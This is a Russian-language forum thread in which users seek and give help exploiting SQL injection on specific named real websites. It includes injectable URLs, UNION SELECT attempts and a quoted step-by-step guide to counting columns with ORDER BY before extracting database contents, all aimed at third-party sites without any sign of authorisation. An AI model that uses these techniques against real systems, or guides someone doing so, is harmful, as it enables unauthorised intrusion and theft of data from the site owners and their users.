Вот код не выдает табл...

code:


Вот скрин

есть прога для упрощение иньекций

SQLIHelperV извините ссылочки нет

code:


code:


чё тут не так?)

http://www.turkishculturalfoundation...ages.php?ID=82'
Подскажите как раскрутить инъекцию дальше? я ставилю запросы но ничего не происходит.

Дай ссылку на обычный сайт ща сам попробую

http://www.turkishculturalfoundation.org/

Добавлено через 25 минут
просканил xspider говарит что инъекция есть

Добавлено через 1 час 1 минуту
Kit,ну что получилось чтонибудь?

Добавлено через 1 час 52 минуты
http://www.aquariustour.ru/news/
А где id взять чтоб инъекцию дальше расскрутить?

The used SELECT statements have a different number of columns

Это вылезает вместо просмотра таблиц БД юзера

http://sitename.net/showsoft.php?id=...ion+select+1/*

Чооооооо делать, не подскажете?))))

Цитата:


>The used SELECT statements have a different number of columns

Это вылезает вместо просмотра таблиц БД юзера

http://sitename.net/showsoft.php?id=...ion+select+1/*

Чооооооо делать, не подскажете?))))
================================================== ========



Если я в этом что и рублю то, вы неправильно опеределили количество таблиц(одной быть походу не может)

Сначала нужно узнать количество а уже потом просматривать версию БД и т.д.

Сначала узнайте количество таблиц при помощи команды order+by:

Цитата:


Следующим шагом нам необходимо узнать количество таблиц. Это делается при помощи команды order+by
http://site.com/main.php?id=12+order+by+1/* - при введении этой команды ошибка должна исчезнуть потомучто количество таблиц больше чем 1...
http://site.com/main.php?id=12+order+by+10000/* - ошибка появляется вновь потомучто количество таблиц меньше чем 10000
http://site.com/main.php?id=12+order+by+10/* - ошибка исчезла а при введении http://site.com/main.php?id=12+order+by+11/* появилась, из этого следует что количество таблиц 10.

как с этим быть? http://wow.dport.com.ua/bugtracke/?page='

это ведь инъекция?